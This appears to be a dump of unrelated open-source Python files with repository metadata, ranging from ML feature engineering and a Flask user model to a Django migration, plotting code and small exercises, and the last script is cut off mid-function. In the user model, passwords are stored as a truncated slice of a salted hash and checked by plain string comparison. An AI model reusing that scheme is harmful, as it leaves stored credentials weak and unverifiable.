all_data["feature_14_is_normal"] = all_data[["feature_14","gender"]].apply(lambda x:
                                                                       (0 if x[0] < 150 else(2 if x[0] > 416 else 1)) if x[1] == 1 else (3 if x[0] < 89 else(5 if x[0] > 357 else 4)),
                                                                           axis=1)
all_data["feature_14_gender_is_normal"] = all_data[["feature_14","gender"]].apply(lambda x:
                                                                              (0 if x[0] > 420 else 1) if x[1] == 1 else (2 if x[0] > 350 else 3),
                                                                                  axis=1)
all_data["feature_20_is_normal"] = all_data["feature_20"].apply(lambda x: 0 if x < 4 else (2 if x > 10 else 1))
all_data["feature_21_is_normal"] = all_data[["feature_21","gender"]].apply(lambda x:
                                                                       (0 if x[0] < 4.0 else(2 if x[0] > 5.5 else 1)) if x[1] == 1 else (3 if x[0] < 3.5 else(5 if x[0] > 5.0 else 4)),
                                                                           axis=1)
all_data["feature_22_is_normal"] = all_data[["feature_22","gender"]].apply(lambda x:
                                                                       (0 if x[0] < 120 else(2 if x[0] > 160 else 1)) if x[1] == 1 else (3 if x[0] < 110 else(5 if x[0] > 150 else 4)),
                                                                           axis=1)
all_data["feature_23_is_normal"] = all_data[["feature_23","gender"]].apply(lambda x:
                                                                       (0 if x[0] < 0.4 else(2 if x[0] > 0.5 else 1)) if x[1] == 1 else (3 if x[0] < 0.37 else(5 if x[0] > 0.48 else 4)),
                                                                           axis=1)
all_data["feature_24_is_normal"] = all_data["feature_24"].apply(lambda x: 0 if x < 80 else (2 if x > 100 else 1))
all_data["feature_25_is_normal"] = all_data["feature_25"].apply(lambda x: 0 if x < 27 else (2 if x > 34 else 1))
all_data["feature_26_is_normal"] = all_data["feature_26"].apply(lambda x: 0 if x < 320 else (2 if x > 360 else 1))
all_data["feature_27_is_normal"] = all_data["feature_27"].apply(lambda x: 0 if x < 11.5 else (2 if x > 14.5 else 1))
all_data["feature_28_is_normal"] = all_data["feature_28"].apply(lambda x: 0 if x < 100 else (2 if x > 300 else 1))
all_data["feature_29_is_normal"] = all_data["feature_29"].apply(lambda x: 0 if x < 9 else (2 if x > 13 else 1))
all_data["feature_30_is_normal"] = all_data["feature_30"].apply(lambda x: 0 if x < 9 else (2 if x > 17 else 1))
all_data["feature_31_is_normal"] = all_data["feature_31"].apply(lambda x: 0 if x < 0.13 else (2 if x > 0.43 else 1))
all_data["feature_32_is_normal"] = all_data["feature_32"].apply(lambda x: 0 if x < 50 else (2 if x > 70 else 1))
all_data["feature_20_feature_32"] = round(all_data["feature_20"] * all_data['feature_32'],3)
all_data["feature_33_is_normal"] = all_data["feature_33"].apply(lambda x: 0 if x < 20 else (2 if x > 40 else 1))
all_data["feature_20_feature_33"] = round(all_data["feature_20"] * all_data['feature_33'],3)
all_data["feature_34_is_normal"] = all_data["feature_34"].apply(lambda x: 0 if x < 3 else (2 if x > 8 else 1))
all_data["feature_20_feature_34"] = round(all_data["feature_20"] * all_data['feature_34'],3)
all_data["feature_35_is_normal"] = all_data["feature_35"].apply(lambda x: 0 if x < 0.5 else (2 if x > 5 else 1))
all_data["feature_20_feature_35"] = round(all_data["feature_20"] * all_data['feature_35'],3)
all_data["feature_36_is_normal"] = all_data["feature_36"].apply(lambda x: 0 if x < 0 else (2 if x > 1 else 1))
all_data["feature_20_feature_36"] = round(all_data["feature_20"] * all_data['feature_36'],3)
import lightgbm as lgb
# Shallow, heavily regularized LightGBM regressor (num_leaves=5, strong
# feature/bagging subsampling) -- cross-validated below.
model_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=5,
                              learning_rate=0.05, n_estimators=550,
                              max_bin = 25, bagging_fraction = 0.8,
                              bagging_freq = 5, feature_fraction = 0.2319,
                              feature_fraction_seed=9, bagging_seed=9,
                              min_data_in_leaf =7, min_sum_hessian_in_leaf = 12)
# NOTE(review): rmsle_cv is not defined in this script as shown -- presumably
# a cross-validated scoring helper defined elsewhere; confirm before running.
score = rmsle_cv(model_lgb)
print("LGBM score: {:.4f} ({:.4f})\n" .format(score.mean(), score.std()))
# NOTE(review): the list literal below is a bare expression -- it is evaluated
# and immediately discarded (nothing binds it), so it currently has no
# effect.  It looks like the engineered-feature column list pasted from a
# notebook; bind it to a name (e.g. engineered_features = [...]) if it is
# meant to be used.
[ 'feature_0_is_normal',
       'feature_1_is_normal', 'feature_1_feature_0',
       'feature_1_feature_0_is_normal', 'feature_2_is_normal',
       'feature_3_is_normal', 'feature_4_is_normal', 'feature_5_is_normal',
       'feature_6_is_normal', 'feature_8_is_normal', 'feature_9_is_normal',
       'feature_10_is_normal', 'feature_10_gender_is_normal',
       'feature_11_is_normal', 'feature_10_feature_11', 'feature_12_is_normal',
       'feature_13_is_normal', 'feature_14_is_normal',
       'feature_14_gender_is_normal', 'feature_20_is_normal',
       'feature_21_is_normal', 'feature_22_is_normal', 'feature_23_is_normal',
       'feature_24_is_normal', 'feature_25_is_normal', 'feature_26_is_normal',
       'feature_27_is_normal', 'feature_28_is_normal', 'feature_29_is_normal',
       'feature_30_is_normal', 'feature_31_is_normal', 'feature_32_is_normal',
       'feature_20_feature_32', 'feature_33_is_normal',
       'feature_20_feature_33', 'feature_34_is_normal',
       'feature_20_feature_34', 'feature_35_is_normal',
       'feature_20_feature_35', 'feature_36_is_normal',
       'feature_20_feature_36', 'gender_0', 'gender_1']
| [
"cyz_19930904@163.com"
] | cyz_19930904@163.com |
eb7038b7af1edc2861e7a0a6640790e41a21c621 | 4ae20d4134a2ae54d8fd12c798af97b10f671df1 | /python网络编程2/01.复习.py | d9f71cb2976bea5cd14a49abe8671a61bde9b780 | [] | no_license | 964918654/python- | cd82f8a08742212ab614bb8c802f364e93a966cd | ae67a55b4f7e8fcefc562ced9b78a1c6a319ac53 | refs/heads/master | 2020-03-27T05:07:06.323025 | 2018-09-04T13:18:56 | 2018-09-04T13:18:56 | 145,994,986 | 1 | 0 | null | 2018-08-25T01:06:42 | 2018-08-24T13:29:11 | null | UTF-8 | Python | false | false | 147 | py | import socket
# Demo: resolve a hostname to an IPv4 address.  Only the second assignment
# is used; the first is kept as an alternative example host.
url = 'www.python.com' # 199.59.88.81
url = 'www.baidu.com' # 119.75.213.61
# gethostbyname performs a DNS lookup and returns the address as a string.
ip_address = socket.gethostbyname(url)
print(ip_address) | [
"964918654@qq.com"
] | 964918654@qq.com |
7b1a127047ebdd9fb946cd860bd342613a7bd3b2 | 597cababc54f45e94f3c11b4dd26f7344dae7809 | /Luminar_Python/functionalProgramming/product.py | 60c7840c62fd4041ac7cd0329b0213f2ae486406 | [] | no_license | Midhun10/LuminarPython | c87b272dc15746fc2745de774cc425b3a53aed99 | aa5d8ccb574ea1538cefd943c749fd14cd06ee5a | refs/heads/master | 2022-12-26T19:11:18.370001 | 2020-10-08T15:21:05 | 2020-10-08T15:21:05 | 280,052,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | class Product:
def __init__(self,id,name,category,price):
self.id=id
self.name=name
self.category=category
self.price=price
    def __str__(self):
        # Display a product by its name (used by the print(item) loop below).
        return self.name
# Build a small product catalogue.  list.append() returns None, so the old
# `ob = lst.append(...)` bindings were meaningless and have been dropped.
lst = []
lst.append(Product(1001, "Galaxy", "Chocolate", 210))
lst.append(Product(1002, "Lux", "Soap", 45))
lst.append(Product(1003, "Milma", "Milk", 23))
lst.append(Product(1004, "666Rice", "Rice", 310))
for item in lst:
    print(item)
# Upper-cased product names; the lambda parameter is renamed so it no longer
# shadows the Product class.
up = list(map(lambda product: product.name.upper(), lst))
print(up)
# Products costing more than 50.
price = list(filter(lambda product: product.price > 50, lst))
for value in price:
    print(value.price)
| [
"midhun.benny222@gmail.com"
] | midhun.benny222@gmail.com |
c497e6c1ffed217a9eba1e4241cf90a0a6150b49 | 014b859ab3b428be5548ae6022fbb277395f772c | /Model/usermodel.py | f15e02a236d54ecb5a2e9284b890e8d8d5c6a131 | [
"MIT"
] | permissive | reezoobose/long_run | d3a00c713720a42a8755cd1fb1ff3e19c45a5a88 | cbce5cf475d96bcc9bc53f1f6227c8db237c24e5 | refs/heads/master | 2020-03-29T23:50:56.387331 | 2018-11-16T10:24:31 | 2018-11-16T10:24:31 | 150,492,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,118 | py | # <editor-fold desc="Import">
# -*- coding: utf-8 -*-
# import sql alchemy object .
from sql_alchemy_extension import sql_alchemy as db
# we need to store password in salt form .
from werkzeug.security import generate_password_hash, safe_str_cmp
# </editor-fold>
# class must inherit Model from sql Alchemy .
class UserModel(db.Model):
    # <editor-fold desc="Database Table Connection and Coloumn Details">
    """
    Object-relational model of a registered user.

    Stored via Flask-SQLAlchemy; one row per user, keyed by email address.
    """
    # NOTE(review): this attribute is misspelled -- SQLAlchemy looks for
    # `__tablename__` (double underscores on both sides), so the line below
    # has no effect and the table name falls back to the default derived
    # from the class name.  Confirm which table the data actually lives in
    # before changing it.
    __tabalename_ = 'users'
    # True while the user has an active session (set by user_logged_in()).
    logged_in = db.Column(db.Boolean, default=False)
    # display name shown to other players
    username = db.Column(db.String(80))
    # registration email; primary key, hence unique and required
    email_id = db.Column(db.String(30), primary_key=True)
    # credential stored by set_password() -- see the note on that method
    password = db.Column(db.String(80))
    # device the user registered / logs in from
    device_id = db.Column(db.String(80))
    # in-game currency balance
    us_dollar = db.Column(db.BigInteger)
    # </editor-fold>
    # <editor-fold desc="Constructor">
    # constructor
    def __init__(self, username, email_id, password, us_dollar=0, device_id=None):
        """
        Create a user ready to be persisted.

        :param username: display name shown to other players.
        :param email_id: registration email (primary key).
        :param password: plaintext password; only a hash-derived value is stored.
        :param us_dollar: starting in-game currency balance.
        :param device_id: device the user registered from, if known.
        """
        self.username = username
        self.email_id = email_id
        self.password = self.set_password(password)
        self.logged_in = False
        self.us_dollar = us_dollar
        self.device_id = device_id
    # </editor-fold>
    # <editor-fold desc="Class Methods">
    # region for classMethod
    # convert the password into a hashed form before storing it in the database
    @classmethod
    def set_password(cls, password):
        """
        Return a 10-character slice of the salted hash of `password`.

        :param password: plaintext password supplied by the user.
        :return: characters 5..14 of the Werkzeug hash string.
        """
        # NOTE(review): keeping only generated_hash[5:15] discards the salt
        # prefix and most of the digest, so check_password_hash() can never
        # verify this value, and two hashes of the same password will not be
        # equal (Werkzeug salts every call).  Presumably login compares the
        # value some other way -- confirm against the login flow before
        # changing this persisted format.
        generated_hash = generate_password_hash(password)
        return generated_hash[5:15]
    # check the password that is stored in data base and password enter by user are same or not .
    @classmethod
    def check_password(cls, stored_password_in_db, received_password_from_user):
        """
        Constant-time equality check between the stored credential and the
        value received at login.

        :param stored_password_in_db: value previously produced by set_password().
        :param received_password_from_user: value supplied at login time.
        :return: True when the two strings are equal, else False.
        """
        # NOTE(review): this is a plain string comparison, not a hash
        # verification -- it only succeeds if the caller passes the same
        # truncated hash produced by set_password(); verify the caller.
        return safe_str_cmp(stored_password_in_db, received_password_from_user)
    # Is user present in DataBase.
    # search is operated using the email id (primary key).
    @classmethod
    def find_user(cls, email_id):
        """
        Look a user up by email address.

        :param email_id: primary-key email to search for.
        :return: the UserModel instance, or None when no such user exists.
        """
        # SELECT ... FROM <users table> WHERE email_id = :email_id LIMIT 1
        # returns a UserModel object (or None).
        return cls.query.filter_by(email_id=email_id).first( )
    # Find the list of users that are logged in at this instant .
    @classmethod
    def find_users_logged_in(cls):
        """
        List the users who are currently logged in.

        :return: {'Users': [<json dict per logged-in user>]}.
        """
        return {'Users': list(map(lambda x: x.json( ), cls.query.filter_by(logged_in=True).all( )))}
    @classmethod
    def get_leader_board(cls, leader_board_name):
        """
        Return the users whose balance falls in the named leader-board band.

        Bands (in JGD, the in-game currency):
        Newbie - 0 JGD to 500,000 JGD
        Big Man - 500,001 JGD to 1,000,000 JGD
        Businessman - 1,000,001 JGD to 5,000,000 JGD
        Entrepreneur - 5,000,001 JGD to 500,000,000 JGD
        Tycoon - 500,000,001 JGD to 2,000,000,000 JGD
        :param leader_board_name: one of "Newbie", "BigMan", "Businessman",
            "Entrepreneur", "Tycoon" (exact spelling).
        :return: ({'Leader Board': name, 'User': [...], 'Success_Code': 1}, 200).
        """
        user_leader_board_list = None
        user_leader_board_name = None
        if safe_str_cmp(leader_board_name, "Newbie"):
            upper_limit = 500000
            lower_limit = 0
            user_leader_board_name = 'Newbie'
            user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
        elif safe_str_cmp(leader_board_name, "BigMan"):
            upper_limit = 1000000
            lower_limit = 500001
            user_leader_board_name = 'BigMan'
            user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
        elif safe_str_cmp(leader_board_name, "Businessman"):
            upper_limit = 5000000
            lower_limit = 1000001
            user_leader_board_name = 'Businessman'
            user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
        elif safe_str_cmp(leader_board_name, "Entrepreneur"):
            upper_limit = 500000000
            lower_limit = 5000001
            user_leader_board_name = 'Entrepreneur'
            user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
        elif safe_str_cmp(leader_board_name, "Tycoon"):
            upper_limit = 2000000000
            lower_limit = 500000001
            user_leader_board_name = 'Tycoon'
            user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
        # NOTE(review): if leader_board_name matches none of the five boards,
        # user_leader_board_list stays None and the comprehension below raises
        # TypeError -- callers must pass a valid board name.
        return {'Leader Board': user_leader_board_name, 'User': [x.json() for x in user_leader_board_list],
                "Success_Code": 1}, 200
    # </editor-fold>
    # <editor-fold desc="Instance Methods">
    # Save the object in the database.
    def save_data(self):
        """
        Persist this user (insert or update) and commit the session.

        :return: None.
        """
        db.session.add(self)
        db.session.commit( )
    # Remove the object from the database.
    def remove_data(self):
        """
        Delete this user's row and commit the session.

        :return: None.
        """
        db.session.delete(self)
        db.session.commit( )
    # Serialize for API responses.
    def json(self):
        """
        Convert this user to a JSON-serializable dict.

        :return: dict with the user's name, email and currency balance.
        """
        return {'User_Name': self.username, 'Email': self.email_id, "Joe Games Currency": self.us_dollar}
    # Mark a user as logged in or out .
    def user_logged_in(self, logged_in):
        """
        Set the logged-in flag and persist it immediately.

        :param logged_in: True / False.
        :return: None.
        """
        self.logged_in = logged_in
        self.save_data( )
    # </editor-fold>
| [
"reezoobose@rediffmail.com"
] | reezoobose@rediffmail.com |
94cd5f0cfadbc6930ff5dd982ee531f583b68885 | 58345f5012a1c24d638281d977e15c1dc5a8518c | /cs-module-hashtable/fib..py | 75141ccdaeb5d79ba538bd006515ac3c12d79923 | [] | no_license | SyriiAdvent/cs-module-project-hash-tables | 298d071cf632b3606f96f1b8e6bb128ee59508dd | e0fdb508c1e398211e20a56653d9b776730cea24 | refs/heads/master | 2022-11-23T23:49:50.116072 | 2020-08-06T01:45:39 | 2020-08-06T01:45:39 | 284,732,957 | 0 | 0 | null | 2020-08-06T01:45:40 | 2020-08-03T15:12:29 | Python | UTF-8 | Python | false | false | 120 | py | cache = {}
def fib(n):
if n <= 1: return 1
if n not in cache:
cache[n] = fib(n-1) + fib(n-2)
return cache[n] | [
"rgoldhaber24@gmail.com"
] | rgoldhaber24@gmail.com |
6c6dace090ac4698a71aa96258aa378ca9e059f0 | aec9a1f3d1d36f19724e745ca4d09a20f67208dc | /matching/migrations/0006_auto_20210114_2030.py | 799634392703d79e913d7c68e61a37828e2927c9 | [] | no_license | endlessor/open-united-backend | b1b1c3411d0d48bc79b35895c70f24d773ac7344 | 86f6905cce14b834b6bf059fd33157249978bd14 | refs/heads/main | 2023-04-29T13:35:28.529360 | 2021-05-17T14:16:39 | 2021-05-17T14:16:39 | 368,211,786 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 765 | py | # Generated by Django 3.1 on 2021-01-15 20:30
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by `makemigrations`: replaces TaskClaimRequest.status
    # with a new `kind` IntegerField (0=New, 1=Approved, 2=Rejected) and
    # re-labels TaskClaim.kind's choices (0=Done, 1=Active, 2=Failed).
    # NOTE: dependency and operation order is significant for generated
    # migrations, so the lists below are left exactly as generated.
    dependencies = [
        ('matching', '0005_auto_20210113_1839'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='taskclaimrequest',
            name='status',
        ),
        migrations.AddField(
            model_name='taskclaimrequest',
            name='kind',
            field=models.IntegerField(choices=[(0, 'New'), (1, 'Approved'), (2, 'Rejected')], default=0),
        ),
        migrations.AlterField(
            model_name='taskclaim',
            name='kind',
            field=models.IntegerField(choices=[(0, 'Done'), (1, 'Active'), (2, 'Failed')], default=0),
        ),
    ]
| [
"robcoder@hotmail.com"
] | robcoder@hotmail.com |
e740d1914eb233fdd032f838c697340b3914b3c1 | c7a5f6eb6a74fb634e19b21113c7e15f592af826 | /models/Money.py | 4db297d857515b8f33526bf3ec2697c11e75bc31 | [] | no_license | Dmitriysp55/E-shop-lvl2 | b1cb7e82dd421c8647608c8009d4b6c298f29d46 | 3193c7f6c1a98b59431eac0c2099f6a446a29093 | refs/heads/main | 2023-07-08T21:00:55.110157 | 2021-08-17T10:20:54 | 2021-08-17T10:20:54 | 397,206,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,366 | py | CURR = ('EUR', 'USD', 'MDL')
class Money:
    """An amount of money in one of the currencies listed in CURR.

    Validation lives in the set* methods; invalid values raise instead of
    being stored.  Internal state: _id, _amount, _curency (the historical
    spelling is kept because other code reads these attributes directly).
    """
    def __init__(self, id, amount, currency):
        self.setId(id)
        self.setAmount(amount)
        self.setCurrency(currency)
    def setId(self, id):
        """Store the id after checking it is an int in (0, 1000000]."""
        if type(id) is not int:
            raise ValueError('Error: id must be integer')
        if id <= 0 or id > 1000000:
            raise ValueError("Error: id is not valid")
        self._id = id
    def getId(self):
        return self._id
    def setAmount(self, amount):
        """Store a non-negative amount, coerced to int.

        int() itself raises TypeError/ValueError on non-numeric input, so the
        old `if type(amount) is not int` check after the conversion was
        unreachable dead code and has been removed.  Float amounts are still
        silently truncated, exactly as before.
        """
        amount = int(amount)
        if amount < 0:
            raise ValueError('Amount is less than 0')
        self._amount = amount
    def getAmount(self):
        return self._amount
    def setCurrency(self, currency):
        """Store the currency code if it is one of CURR, else raise."""
        if currency in CURR:
            self._curency = currency
        else:
            # kept as a bare Exception for backward compatibility with callers
            raise Exception(f'{currency} is not in predefined list of currencies')
    def getCurrency(self):
        return self._curency
    def __str__(self):
        return f"{self._amount} {self._curency}"
    def __repr__(self):
        return str(self)
class MoneyRepositoryFactory:
    def __init__(self):
        # Private state: auto-increment id counter and the in-memory store.
        self.__lastCreatedId = 0
        self.__money = []
####### FACTORY methods #########
def getMoney(self, amount, currency):
id = self.__lastCreatedId + 1
obj = Money(id,amount, currency)
self.__lastCreatedId = obj.getId()
### remember the object in the list #####
self.save(obj)
return obj
    ####### REPOSITORY methods #########
    # BREAD -> Browse, Read, Edit, Add, Delete
    # Add: append the (assumed Money) object to the in-memory store.
    def save(self,money):
        self.__money.append(money)
def all(self):
return tuple(self.__money)
def findById(self, id):
for p in self.__money:
if p._id == id:
return p
def findByProperty(self, searchProperty):
list_of_found = []
for obj in self.__money:
for name, value in obj.__dict__.items():
if value == searchProperty:
list_of_found.append(obj)
return list_of_found
def deleteById(self, id):
for obj in self.__money:
for name, value in obj.__dict__.items():
if value == id:
self.__money.remove(obj) | [
"noreply@github.com"
] | Dmitriysp55.noreply@github.com |
aaaeaee2bbe92043417c53d038fe346d6e67659e | ec9b63fc607b2c5d29e2bf4e11b0fd79855f0b14 | /python-client/test/test_payment_remittance_information.py | 5e3a82fb8891fc92a8c368cfafdb84e34dab3f61 | [] | no_license | syzer/F21 | 0d538fc417d3ae8369ce8a3392f74fb9460621e2 | 5aeac4cce9265632fd6d8d6680e833a55836d83c | refs/heads/master | 2020-05-01T04:23:38.219040 | 2019-04-16T09:18:46 | 2019-04-16T09:18:46 | 177,273,387 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,084 | py | # coding: utf-8
"""
Swiss Corporate API
This is the release candidate version of the \"Swiss Corporate API\" specification. # noqa: E501
OpenAPI spec version: 1.0.0.2-SNAPSHOT
Contact: swisscorpapi@six-group.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.payment_remittance_information import PaymentRemittanceInformation # noqa: E501
from swagger_client.rest import ApiException
class TestPaymentRemittanceInformation(unittest.TestCase):
    """Unit-test stubs for the PaymentRemittanceInformation model."""

    def setUp(self):
        """No fixtures are needed for these generated stubs."""
        pass

    def tearDown(self):
        """Nothing to clean up."""
        pass

    def testPaymentRemittanceInformation(self):
        """Test PaymentRemittanceInformation.

        FIXME: construct the model with its mandatory attributes set to
        example values, e.g.
        model = swagger_client.models.payment_remittance_information.PaymentRemittanceInformation()  # noqa: E501
        """
        pass


if __name__ == '__main__':
    unittest.main()
| [
"hexagon6@fet.li"
] | hexagon6@fet.li |
cca7933e5e9525d998480061afe282434637860a | e485bf3a4ef0ee46556fe0c33d16b9d40af54fc2 | /Kattis-Problems/Python-Solutions/PizzaCrust.py | c49aef3bc4f0e38d8d37c01e74d8bd2e2bafae7e | [] | no_license | djharten/Coding-Challenges | d48650569930a06db4e8b590d8f1ffa4d627bf3b | a1a85af8a7631ec05da70459d843db660f08169d | refs/heads/master | 2020-05-18T08:18:14.528845 | 2019-04-30T16:25:03 | 2019-04-30T16:25:03 | 184,289,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | import cmath
def crust_percentage(radius, crust_width):
    """Return the inner disc area (radius minus crust) as a percentage of the
    whole pizza's area.

    The pi factors cancel mathematically; they are kept so the float result is
    bit-identical to the original script's output. NOTE(review): cmath is used
    only for its (real-valued) pi constant, exactly as the original did.
    """
    inner_radius = radius - crust_width
    pizza_area = cmath.pi * pow(radius, 2)
    return ((cmath.pi * pow(inner_radius, 2)) / pizza_area) * 100


if __name__ == "__main__":
    # Kattis input: pizza radius and crust width on one line.
    a, b = map(int, input().split())
    print(crust_percentage(a, b))
"noreply@github.com"
] | djharten.noreply@github.com |
a3276781a20218d522af7d641743b76a41ef7f33 | 67f0d1f5f8fb32a98a5299975a0d5790f13a8167 | /action/conftest.py | 95e7f65612d677874f4a93930bed364e728294d1 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
"""Configuration and fixtures for the GitHub action"""

# Keep Pytest from collecting the action's entry-point module.
collect_ignore = ["main.py"]
| [
"13725+akaihola@users.noreply.github.com"
] | 13725+akaihola@users.noreply.github.com |
22c03deb0d8157383f3c1246c029e58a5a3f8e90 | 6ab67facf12280fedf7cc47c61ae91da0bcf7339 | /service/yowsup/yowsup/layers/protocol_media/protocolentities/message_media_vcard.py | 2d57fbcbadbf58e9a66ad180420dd4e70030640f | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later"
] | permissive | PuneethReddyHC/whatsapp-rest-webservice | 2f035a08a506431c40b9ff0f333953b855f9c461 | 822dfc46b80e7a26eb553e5a10e723dda5a9f77d | refs/heads/master | 2022-09-17T14:31:17.273339 | 2017-11-27T11:16:43 | 2017-11-27T11:16:43 | 278,612,537 | 0 | 1 | MIT | 2020-07-10T11:04:42 | 2020-07-10T11:04:41 | null | UTF-8 | Python | false | false | 5,305 | py | from yowsup.structs import ProtocolEntity, ProtocolTreeNode
from .message_media import MediaMessageProtocolEntity
class VCardMediaMessageProtocolEntity(MediaMessageProtocolEntity):
    """A "media" message whose payload is a contact vCard.

    Wire shape (attributes abbreviated; the vcard node's data is the raw
    BEGIN:VCARD ... END:VCARD text):

        <message type="text" ...>
            <media type="vcard">
                <vcard name="{CONTACT_NAME}">BEGIN:VCARD ... END:VCARD</vcard>
            </media>
        </message>
    """
    def __init__(self, name, card_data, _id = None, _from = None, to = None, notify = None, timestamp = None, participant = None,
            preview = None, offline = None, retry = None):
        super(VCardMediaMessageProtocolEntity, self).__init__("vcard", _id, _from, to, notify, timestamp, participant, preview, offline, retry)
        self.setVcardMediaProps(name, card_data)

    def __str__(self):
        # Intentionally invokes the *grandparent* __str__ (the original code
        # skipped MediaMessageProtocolEntity's own formatting as well).
        text = super(MediaMessageProtocolEntity, self).__str__()
        text += "Name: %s\n" % self.name
        text += "Card Data: %s\n" % self.card_data
        return text

    def getName(self):
        """Contact display name carried on the vcard node."""
        return self.name

    def getCardData(self):
        """Raw vCard body text."""
        return self.card_data

    def setVcardMediaProps(self, name, card_data):
        """Attach the vcard-specific attributes to this entity."""
        self.name = name
        self.card_data = card_data

    def toProtocolTreeNode(self):
        root = super(VCardMediaMessageProtocolEntity, self).toProtocolTreeNode()
        media = root.getChild("media")
        media["type"] = "vcard"
        media.addChild(ProtocolTreeNode("vcard", {"name": self.name}, None, self.card_data))
        return root

    @staticmethod
    def fromProtocolTreeNode(node):
        entity = MediaMessageProtocolEntity.fromProtocolTreeNode(node)
        entity.__class__ = VCardMediaMessageProtocolEntity
        media = node.getChild("media")
        entity.setVcardMediaProps(
            media.getAllChildren()[0].getAttributeValue('name'),
            media.getChild("vcard").getData()
        )
        return entity
"svub@x900.svub.net"
] | svub@x900.svub.net |
270dd2884ed8cee274b40fa9bc94411663fdaa83 | 17c89e34e24564c0c4948b0e6b597ee2d9ab2761 | /bin/3a.py | ce30b4f181d28a41239d63840aa30513fcfa9c07 | [] | no_license | maciejczyzewski/kck2019 | 3cc024487dfba535abdb3b4251e29512729ccb9b | ec11ee42e26aa83a086382e4ecd54e8cb52c9bb1 | refs/heads/master | 2020-08-23T21:14:48.613366 | 2019-10-26T00:27:31 | 2019-10-26T00:27:31 | 216,707,391 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,175 | py | import matplotlib
# matplotlib.use("Agg") # So that we can render files without GUI
import matplotlib.pyplot as plt
from matplotlib import rc
import numpy as np
import sys, math
from matplotlib import colors
from collections.abc import Iterable
def plot_color_gradients(gradients, names, height=None):
    """Render each gradient callable as a horizontal colour bar.

    gradients: iterable of callables mapping v in [0, 1] to an (r, g, b)
    tuple with components in [0, 1]; names: matching row labels.
    Shows the figure and also writes it to gradients.pdf.
    """
    rc("legend", fontsize=10)
    column_width_pt = 400  # Show in latex using \the\linewidth
    pt_per_inch = 72
    size = column_width_pt / pt_per_inch
    height = 0.75 * size if height is None else height
    fig, axes = plt.subplots(nrows=len(gradients),
                             sharex=True,
                             figsize=(size, height))
    fig.subplots_adjust(top=1.00, bottom=0.05, left=0.25, right=0.95)
    # A single-row subplot call yields a bare Axes, not a list -- normalise.
    if not isinstance(axes, Iterable):
        axes = [axes]
    for ax, gradient, name in zip(axes, gradients, names):
        # Create image with two lines and draw gradient on it
        img = np.zeros((2, 1024, 3))
        for i, v in enumerate(np.linspace(0, 1, 1024)):
            img[:, i] = gradient(v)
        im = ax.imshow(img, aspect="auto")
        im.set_extent([0, 1, 0, 1])
        ax.yaxis.set_visible(False)
        # Place the row label to the left of its bar, vertically centred.
        pos = list(ax.get_position().bounds)
        x_text = pos[0] - 0.25
        y_text = pos[1] + pos[3] / 2.0
        fig.text(x_text, y_text, name, va="center", ha="left", fontsize=10)
    plt.show()
    fig.savefig("gradients.pdf")
################################################################################
################################################################################
def n(x):
    """Clamp x to the closed interval [0, 1].

    (Was a lambda bound to a name; PEP 8 E731 prefers a def.)
    """
    return max(0, min(1, x))


# Gaussian bump parameters (comments translated from Polish):
#   a - peak height (maximum value reached)
#   b - peak position (centre)
#   c - width / steepness
#   d - vertical offset
def gaussian(x, a, b, c, d=0):
    """Evaluate a * exp(-(x - b)^2 / (2 c^2)) + d at x."""
    b += 0.00001  # tiny shift kept from the original; FIXME: purpose unclear
    return a * math.exp(-(x - b)**2 / (2 * c**2)) + d
def isogradient(v, pallete):
    """Sample the colour at v in [0, 1] from a palette of Gaussian bumps."""
    params = isopallete(pallete)

    def find_near_k(v, params, k=4):
        # Keep only the k bumps whose centres are closest to v (0..255 scale).
        ranked = sorted([abs(v * 255 - p[1]), p] for p in params)
        return [entry[1] for entry in ranked[:k]]

    channels = []
    # params holds the red, green and blue parameter lists, in that order.
    for channel_params in params:
        total = sum(gaussian(v * 255, *p) for p in find_near_k(v, channel_params))
        channels.append(n(int(total) / 255))
    return tuple(channels)
def isopallete(pallete):
    """Turn {position: [r, g, b]} into per-channel Gaussian parameter lists.

    Each palette stop yields [peak_height, position * 255, width]; the width
    narrows as the palette gains more stops.
    """
    # FIXME: output could be cached
    width = 255 / (len(pallete) * 2)
    reds, greens, blues = [], [], []
    for position, (r, g, b) in pallete.items():
        centre = position * 255
        reds.append([r, centre, width])
        greens.append([g, centre, width])
        blues.append([b, centre, width])
    return [reds, greens, blues]
def test_gradient(f):
    """Debug helper: plot gradient f's r/g/b channel curves plus its bar,
    then terminate the whole process via sys.exit().
    """
    vec_x = np.arange(0, 1, 0.005)
    # np.vectorize maps f over the samples; the tuple return unpacks into
    # the three colour channels.
    vec_y1, vec_y2, vec_y3 = np.vectorize(f)(vec_x)
    plt.plot(vec_x, vec_y1, color="red")
    plt.plot(vec_x, vec_y2, color="green")
    plt.plot(vec_x, vec_y3, color="blue")
    plot_color_gradients([f], ["test"], height=0.5)
    sys.exit()
################################################################################
################################################################################
def hsv2rgb(h, s, v):
    """Convert HSV (h in degrees, s and v in [0, 1]) to an (r, g, b) triple."""
    chroma = v * s
    x = chroma * (1 - abs((h / 60) % 2 - 1))
    m = v - chroma
    # The hue circle splits into six 60-degree sectors.
    sector = int(h / 60) % 6
    base = {
        0: (chroma, x, 0),
        1: (x, chroma, 0),
        2: (0, chroma, x),
        3: (0, x, chroma),
        4: (x, 0, chroma),
        5: (chroma, 0, x),
    }[sector]
    r, g, b = base
    return ((r + m), (g + m), (b + m))
def gradient_rgb_bw(v):
